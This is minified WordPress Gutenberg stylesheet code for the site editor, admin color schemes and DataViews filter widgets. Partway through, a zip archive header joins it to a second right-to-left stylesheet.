.edit-site-site-hub__view-mode-toggle-container{ flex-shrink:0; height:64px; width:64px; } .edit-site-site-hub__view-mode-toggle-container.has-transparent-background .edit-site-layout__view-mode-toggle-icon{ background:#0000; } .edit-site-site-hub__title .components-button{ color:#e0e0e0; display:block; flex-grow:1; font-size:15px; font-weight:500; margin-right:-4px; overflow:hidden; padding-left:16px; position:relative; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; } .edit-site-site-hub__title .components-button:active,.edit-site-site-hub__title .components-button:focus,.edit-site-site-hub__title .components-button:hover{ color:#e0e0e0; } .edit-site-site-hub__title .components-button:focus{ box-shadow:none; outline:none; } .edit-site-site-hub__title .components-button:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #1e1e1e, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .edit-site-site-hub__title .components-button:after{ content:"↗"; font-weight:400; left:0; opacity:0; position:absolute; } @media not (prefers-reduced-motion){ .edit-site-site-hub__title .components-button:after{ transition:opacity .1s linear; } } .edit-site-site-hub__title .components-button:active:after,.edit-site-site-hub__title .components-button:focus:after,.edit-site-site-hub__title .components-button:hover:after{ opacity:1; } .edit-site-site-hub_toggle-command-center{ color:#e0e0e0; } .edit-site-site-hub_toggle-command-center:active svg,.edit-site-site-hub_toggle-command-center:hover svg{ fill:#f0f0f0; } .edit-site-site-icon__icon{ fill:currentColor; height:100%; width:100%; } .edit-site-layout.is-full-canvas .edit-site-site-icon__icon{ padding:12px; } .edit-site-site-icon__image{ aspect-ratio:1/1; background:#333; height:100%; object-fit:cover; width:100%; } .edit-site-layout.is-full-canvas .edit-site-site-icon__image{ border-radius:0; } .edit-site-editor__view-mode-toggle button:focus{ position:relative; } .edit-site-editor__view-mode-toggle button:focus:before{ bottom:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff; content:""; display:block; left:0; position:absolute; right:0; top:0; z-index:1; } .edit-site-editor-canvas-container{ background-color:var(--wp-editor-canvas-background); height:100%; } .edit-site-editor-canvas-container iframe{ display:block; height:100%; width:100%; } .edit-site-layout.is-full-canvas .edit-site-editor-canvas-container{ padding:24px 24px 0; } .edit-site-editor-canvas-container__section{ background:#fff; border-radius:8px; bottom:0; left:0; overflow:hidden; position:absolute; right:0; top:0; } @media not (prefers-reduced-motion){ .edit-site-editor-canvas-container__section{ transition:all .3s; } } .edit-site-editor-canvas-container__close-button{ background:#fff; left:8px; position:absolute; top:8px; z-index:2; } .edit-site-post-list__featured-image{ height:100%; object-fit:cover; width:100%; } .edit-site-post-list__featured-image-wrapper{ border-radius:4px; height:100%; width:100%; } .edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)){ background-color:#f0f0f0; border-radius:4px; display:block; flex-grow:0 !important; height:32px; overflow:hidden; position:relative; width:32px; } .edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button:after,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)):after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; position:absolute; right:0; top:0; width:100%; } .edit-site-post-list__featured-image-button{ background-color:unset; border:none; border-radius:4px; box-shadow:none; box-sizing:border-box; cursor:pointer; height:100%; overflow:hidden; padding:0; width:100%; } .edit-site-post-list__featured-image-button:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-view-grid__card.is-selected .edit-site-post-list__featured-image-button:after{ background:rgba(var(--wp-admin-theme-color--rgb), .04); box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .edit-site-post-list__status-icon{ height:24px; width:24px; } .edit-site-post-list__status-icon svg{ fill:currentColor; margin-right:-4px; } .edit-site-resizable-frame__inner{ position:relative; } body:has(.edit-site-resizable-frame__inner.is-resizing){ cursor:col-resize; user-select:none; -webkit-user-select:none; } .edit-site-resizable-frame__inner.is-resizing:before{ content:""; inset:0; position:absolute; z-index:1; } .edit-site-resizable-frame__inner-content{ inset:0; position:absolute; z-index:0; } .edit-site-resizable-frame__handle{ align-items:center; background-color:#75757566; border:0; border-radius:4px; cursor:col-resize; display:flex; height:64px; justify-content:flex-end; padding:0; position:absolute; top:calc(50% - 32px); width:4px; z-index:100; } .edit-site-resizable-frame__handle:before{ content:""; height:100%; position:absolute; right:100%; width:32px; } .edit-site-resizable-frame__handle:after{ content:""; height:100%; left:100%; position:absolute; width:32px; } .edit-site-resizable-frame__handle:focus-visible{ outline:2px solid #0000; } .edit-site-resizable-frame__handle.is-resizing,.edit-site-resizable-frame__handle:focus,.edit-site-resizable-frame__handle:hover{ background-color:var(--wp-admin-theme-color); } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } } #adminmenumain,#wpadminbar{ display:none; } #wpcontent{ margin-right:0; } body.js #wpbody{ padding-top:0; } body{ background:#fff; } body #wpcontent{ padding-right:0; } body #wpbody-content{ padding-bottom:0; } body #wpbody-content>div:not(#gutenberg-posts-dashboard):not(#screen-meta),body #wpfooter{ display:none; } body .a11y-speak-region{ right:-1px; top:-1px; } body ul#adminmenu a.wp-has-current-submenu:after,body ul#adminmenu>li.current>a.current:after{ border-left-color:#fff; } body .media-frame select.attachment-filters:last-of-type{ max-width:100%; width:auto; } #gutenberg-posts-dashboard{ box-sizing:border-box; } #gutenberg-posts-dashboard *,#gutenberg-posts-dashboard :after,#gutenberg-posts-dashboard :before{ box-sizing:inherit; } #gutenberg-posts-dashboard{ height:100vh; } @media (min-width:600px){ #gutenberg-posts-dashboard{ bottom:0; left:0; min-height:100vh; position:fixed; right:0; top:0; } } .no-js #gutenberg-posts-dashboard{ min-height:0; position:static; } #gutenberg-posts-dashboard .components-editor-notices__snackbar{ bottom:16px; left:0; padding-left:16px; padding-right:16px; position:fixed; }PK!`bdist/edit-site/style-rtl.cssnuȯ@charset "UTF-8"; .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .dataviews-picker-wrapper,.dataviews-wrapper{ box-sizing:border-box; container:dataviews-wrapper/inline-size; display:flex; flex-direction:column; font-size:13px; height:100%; line-height:1.4; overflow:auto; scroll-padding-bottom:64px; } .dataviews-filters__container,.dataviews__view-actions{ box-sizing:border-box; flex-shrink:0; padding:16px 48px; position:sticky; right:0; } @media not (prefers-reduced-motion){ .dataviews-filters__container,.dataviews__view-actions{ transition:padding .1s ease-out; } } .dataviews-loading,.dataviews-no-results{ align-items:center; display:flex; flex-grow:1; justify-content:center; padding:0 48px; } @media not (prefers-reduced-motion){ .dataviews-loading,.dataviews-no-results{ transition:padding .1s ease-out; } } .dataviews-loading-more{ text-align:center; } @container (max-width: 430px){ .dataviews-filters__container,.dataviews__view-actions{ padding:12px 24px; } .dataviews-loading,.dataviews-no-results{ padding-left:24px; padding-right:24px; } } .dataviews-title-field{ font-size:13px; font-weight:500; width:100%; } .dataviews-title-field,.dataviews-title-field a{ color:#2f2f2f; text-overflow:ellipsis; white-space:nowrap; } .dataviews-title-field a{ display:block; flex-grow:0; overflow:hidden; text-decoration:none; } .dataviews-title-field a:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field a:focus{ border-radius:2px; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color, #007cba); color:var(--wp-admin-theme-color--rgb); } .dataviews-title-field button.components-button.is-link{ color:#1e1e1e; display:block; font-weight:inherit; overflow:hidden; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; width:100%; } .dataviews-title-field button.components-button.is-link:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field--clickable{ color:#2f2f2f; cursor:pointer; } .dataviews-title-field--clickable:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field--clickable:focus{ border-radius:2px; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color, #007cba); color:var(--wp-admin-theme-color--rgb); } .components-card__body:has(>.dataviews-picker-wrapper),.components-card__body:has(>.dataviews-wrapper){ overflow:hidden; padding:8px 0 0; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews__view-actions,.components-card__body:has(>.dataviews-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-wrapper) .dataviews__view-actions{ padding-inline:24px; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:first-child{ padding-inline-start:24px; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:last-child{ padding-inline-end:24px; } .dataviews-bulk-actions-footer__item-count{ color:#1e1e1e; font-size:11px; font-weight:500; text-transform:uppercase; } .dataviews-bulk-actions-footer__container{ margin-left:auto; min-height:32px; } .dataviews-filters__button{ position:relative; } .dataviews-filters__container{ padding-top:0; } .dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true],.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:hover{ opacity:0; } .dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:focus{ opacity:1; } .dataviews-filters__summary-popover{ font-size:13px; line-height:1.4; } .dataviews-filters__summary-popover .components-popover__content{ border-radius:4px; max-width:250px; min-width:230px; width:100%; } .dataviews-filters__summary-popover.components-dropdown__content .components-popover__content{ padding:0; } .dataviews-filters__summary-operators-container{ padding:8px 16px; } .dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-listbox),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-no-elements),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__user-input-widget){ border-bottom:1px solid #e0e0e0; } .dataviews-filters__summary-operators-container:empty{ display:none; } .dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-name{ color:#757575; flex-shrink:0; max-width:calc(100% - 55px); overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-select{ overflow:hidden; white-space:nowrap; width:100%; } .dataviews-filters__summary-chip-container{ position:relative; white-space:pre-wrap; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip{ align-items:center; background:#f0f0f0; border:1px solid #0000; border-radius:16px; box-sizing:border-box; color:#2f2f2f; cursor:pointer; display:flex; min-height:32px; padding:4px 12px; position:relative; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable{ cursor:default; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-reset{ padding-inline-end:28px; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:hover:not(.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable),.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip[aria-expanded=true]{ background:#e0e0e0; color:#1e1e1e; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values{ background:rgba(var(--wp-admin-theme-color--rgb), .04); color:var(--wp-admin-theme-color); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values:hover,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values[aria-expanded=true]{ background:rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:none; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip .dataviews-filters-__summary-filter-text-name{ font-weight:500; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove{ align-items:center; background:#0000; border:0; border-radius:50%; cursor:pointer; display:flex; height:24px; justify-content:center; left:4px; padding:0; position:absolute; top:50%; transform:translateY(-50%); width:24px; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove svg{ fill:#757575; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover{ background:#e0e0e0; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus svg,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover svg{ fill:#1e1e1e; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values svg{ fill:var(--wp-admin-theme-color); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:none; } .dataviews-filters__search-widget-filter-combobox-list{ border-top:1px solid #e0e0e0; max-height:184px; overflow:auto; padding:4px; } .dataviews-filters__search-widget-filter-combobox-list .dataviews-filters__search-widget-filter-combobox-item-value [data-user-value]{ font-weight:600; } .dataviews-filters__search-widget-listbox{ overflow:auto; padding:4px; } .dataviews-filters__search-widget-listitem{ align-items:center; border-radius:2px; box-sizing:border-box; cursor:default; display:flex; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; gap:8px; line-height:20px; min-height:32px; padding:4px 12px; } .dataviews-filters__search-widget-listitem:last-child{ margin-block-end:0; } .dataviews-filters__search-widget-listitem:focus,.dataviews-filters__search-widget-listitem:hover,.dataviews-filters__search-widget-listitem[data-active-item]{ background-color:var(--wp-admin-theme-color); color:#fff; } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-description{ color:#fff; } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection{ background:#fff; border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection.is-selected{ background:var(--wp-admin-theme-color-darker-20, #183ad6); border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection{ border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection.is-selected{ background:var(--wp-admin-theme-color-darker-20, #183ad6); border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-description{ color:#757575; display:block; font-size:12px; line-height:16px; overflow:hidden; text-overflow:ellipsis; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ border:1px solid #1e1e1e; border-radius:50%; height:24px; margin-left:12px; max-width:24px; min-width:24px; position:relative; transition:none; width:24px; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ height:16px; max-width:16px; min-width:16px; width:16px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{ background-color:#fff; border:4px solid #fff; box-sizing:inherit; height:12px; margin:0; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); width:12px; } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{ height:8px; width:8px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked{ background:var(--wp-admin-theme-color); border:none; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ margin:0; padding:0; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected{ background:var(--wp-admin-theme-color, #3858e9); border-color:var(--wp-admin-theme-color, #3858e9); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{ background-color:#fff; border:4px solid #fff; border-radius:50%; box-sizing:inherit; content:""; height:12px; margin:0; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); width:12px; } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{ height:8px; width:8px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ --checkbox-size:24px; border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; margin-left:12px; padding:6px 8px; transition:none; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ font-size:13px; line-height:normal; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-webkit-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-moz-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:-ms-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked::-ms-check{ opacity:0; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ color:#fff; margin:-3px -5px; } @media (min-width:782px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ margin:-4px -5px 0 0; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ content:"\f460"; display:inline-block; float:right; font:normal 30px/1 dashicons; vertical-align:middle; width:16px; speak:none; -webkit-font-smoothing:antialiased; -moz-osx-font-smoothing:grayscale; } @media (min-width:782px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ float:none; font-size:21px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:disabled,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-disabled=true]{ background:#f0f0f0; border-color:#ddd; cursor:default; opacity:1; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ background:#fff; color:#1e1e1e; height:var(--checkbox-size); margin:0; padding:0; position:relative; width:var(--checkbox-size); } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ --checkbox-size:16px; } } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ transition:border-color .1s ease-in-out; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected{ background:var(--wp-admin-theme-color, #3858e9); border-color:var(--wp-admin-theme-color, #3858e9); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{ --checkmark-size:var(--checkbox-size); fill:#fff; height:var(--checkmark-size); position:absolute; right:50%; top:50%; transform:translate(50%, -50%); width:var(--checkmark-size); } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{ --checkmark-size:calc(var(--checkbox-size) + 4px); } } .dataviews-filters__search-widget-filter-combobox__wrapper{ padding:8px; position:relative; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ font-size:13px; line-height:normal; } } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-moz-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:-ms-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ display:block; font-size:16px; height:32px; margin-left:0; margin-right:0; padding:0 32px 0 8px; width:100%; } @media (min-width:600px){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ font-size:13px; } } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{ background:#fff; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::placeholder{ color:#757575; } 